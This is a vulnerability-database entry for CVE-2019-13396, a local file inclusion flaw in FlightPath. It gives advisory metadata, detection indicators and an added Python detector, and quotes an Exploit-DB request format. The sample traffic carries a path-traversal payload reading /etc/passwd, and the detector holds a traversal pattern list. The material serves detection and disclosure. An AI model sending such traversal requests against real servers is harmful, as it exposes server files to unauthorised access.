CVE-2019-13396
Published 2019-07-10
Priority P180 · Severity medium (CVSS 3.0 base score 5.3, vector AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)
Exploited in the wild (ITW exploit; listed in VulnCheck KEV)
EPSS: 62.57% (99.1th percentile)
FlightPath 4.x and 5.0-x allows directory traversal and Local File Inclusion through the form_include parameter in an index.php?q=system-handle-form-submit POST request because of an include_once in system_handle_form_submit in modules/system/system.module.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| getflightpath | flightpath | — | — |
| getflightpath | flightpath | 4.0 – 4.8.3 | — |
Detection & IOCs (extracted from sources)
- Look for POST requests to index.php?q=system-handle-form-submit containing the 'form_include' parameter with directory traversal sequences (e.g., '../').
- Exploitation requires a valid form_token, which the attacker first retrieves via a GET /login request (even with invalid credentials). Monitor for a rapid GET /login followed by a POST to system-handle-form-submit.
- The vulnerable parameter is 'form_include' in the POST body, processed by include_once in system_handle_form_submit inside modules/system/system.module. Alert on any non-empty form_include value containing path traversal characters.
- Successful exploitation of LFI to read /etc/passwd will produce a response body matching the pattern 'root:.*:0:0:'. Use this as a response-based detection signature.
- The exploit requires a two-step process: first obtain a valid form_token via GET /login, then use it in the malicious POST. Detection rules must account for this token-harvesting pre-step.
- The vulnerability affects FlightPath versions prior to 4.8.2 and 5.0-rc2 only. Scope detection rules to these version ranges.
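As an added example (not part of this page or of the FlightPath project), the three detection points above turned into logic that runs over constructed WAF-style request records carrying the POST body; the record layout and the 60-second GET /login to POST window are assumptions.

```python
# Detection for CVE-2019-13396 over WAF/proxy records that include the POST body.
# Added example, not from the page or FlightPath; record layout and window are assumptions.
import re
from datetime import datetime
from urllib.parse import parse_qs, unquote, urlparse

TRAVERSAL = re.compile(r"\.\./|\.\.\\|/etc/|php://|\x00")
PASSWD_LEAK = re.compile(r"root:.*:0:0:")   # response signature from the IOC list
TOKEN_WINDOW_S = 60                          # assumed max gap between GET /login and POST

def is_target_request(rec):
    """POST to index.php?q=system-handle-form-submit, the vulnerable handler."""
    u = urlparse(rec["url"])
    return (rec["method"] == "POST" and u.path.endswith("/index.php")
            and parse_qs(u.query).get("q") == ["system-handle-form-submit"])

def suspicious_form_include(body):
    """Decoded form_include value if non-empty and carrying a traversal, else None."""
    for value in parse_qs(body, keep_blank_values=True).get("form_include", []):
        decoded = unquote(unquote(value))  # parse_qs decoded once; also catch %252F
        if decoded and TRAVERSAL.search(decoded):
            return decoded
    return None

def analyze(records):
    """Walk records in time order; return (ts, ip, reason) alerts."""
    alerts, seen = [], []
    for rec in records:
        inc = suspicious_form_include(rec.get("body", "")) if is_target_request(rec) else None
        if inc:
            t = datetime.fromisoformat(rec["ts"])
            harvested = any(h["ip"] == rec["ip"] and h["method"] == "GET" and "login" in h["url"]
                            and 0 <= (t - datetime.fromisoformat(h["ts"])).total_seconds() <= TOKEN_WINDOW_S
                            for h in seen)
            reason = "form_include traversal: " + inc
            reason += "; preceded by GET /login (form_token harvest)" if harvested else ""
            reason += "; response leaks /etc/passwd" if PASSWD_LEAK.search(rec.get("response", "")) else ""
            alerts.append((rec["ts"], rec["ip"], reason))
        seen.append(rec)
    return alerts

SAMPLE = [  # constructed records, not real traffic
    {"ts": "2019-07-15T10:00:00", "ip": "198.51.100.7", "method": "GET",
     "url": "/flightpath/index.php?q=login", "response": "<form>"},
    {"ts": "2019-07-15T10:00:03", "ip": "198.51.100.7", "method": "POST",
     "url": "/flightpath/index.php?q=system-handle-form-submit",
     "body": "callback=system_login_form&form_token=abc&form_path=login"
             "&form_include=..%2F..%2F..%2F..%2Fetc%2Fpasswd",
     "response": "root:x:0:0:root:/root:/bin/sh\n"},
]
```

Running `analyze(SAMPLE)` yields one alert for 198.51.100.7 that records both the preceding login GET and the leaked passwd signature; an empty form_include (the benign case in the Exploit-DB request) produces none.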
CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| NVD | v3.0 | 5.3 | MEDIUM | CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N |
| NVD | v2.0 | 5.0 | MEDIUM | AV:N/AC:L/Au:N/C:P/I:N/A:N |
| VulnCheck | — | 5.3 | MEDIUM | — |
GHSA
GHSA-7hrr-3p9q-x2q8: FlightPath 4 (unreviewed advisory, 2022-05-24; severity MEDIUM; CWE-22)
VulnCheck
getflightpath flightpath Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') (2019; CVSS 5.3, MEDIUM)
Affected: getflightpath flightpath
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2026-05-11&host_type=src&vulnerability=cve-2019-13396
No detection rules found.
Exploit-DB
FlightPath < 4.8.2 / < 5.0-rc2 - Local File Inclusion (2019-07-15; CVSS 5.3, MEDIUM)
```text
# Exploit Title: FlightPath < 4.8.2 & < 5.0-rc2 - Local File Inclusion
# Date: 07-07-2019
# Exploit Author: Mohammed Althibyani
# Vendor Homepage: http://getflightpath.com
# Software Link: http://getflightpath.com/project/9/releases
# Version: < 4.8.2 & < 5.0-rc2
# Tested on: Kali Linux
# CVE : CVE-2019-13396
# Parameters : include_form
# POST Method:
Use the login form to get the right form_token [you can use a wrong user/pass].
This is how the POST looks:
POST /flightpath/index.php?q=system-handle-form-submit HTTP/1.1
callback=system_login_form&form_token=fb7c9d22c839e3fb5fa93fe383b30c9b&form_type=&form_path=login&form_params=YTowOnt9&form_include=&default_redirect_path=login&default_redirect_query=current_student_id%3D%26a
```
Nuclei
FlightPath - Local File Inclusion (CVSS 5.3, MEDIUM)
FlightPath versions prior to 4.8.2 and 5.0-rc2 are vulnerable to local file inclusion.
Template:
```yaml
id: CVE-2019-13396
info:
  name: FlightPath - Local File Inclusion
  author: 0x_Akoko,daffainfo
  severity: medium
  description: FlightPath versions prior to 4.8.2 and 5.0-rc2 are vulnerable to local file inclusion.
  impact: |
    This vulnerability can lead to unauthorized access, data leakage, and remote code execution.
  remediation: |
    Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/47121
    - http://getflightpath.com/node/2650
    - https://nvd.nist.gov/vuln/detail/CVE-2019-13396
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/d4n-sec/d4n-sec.github.io
  classification:
    cvss-metrics: CVSS:3
```
No writeups or analysis indexed.
Timeline: published 2019-07-10; exploited in the wild.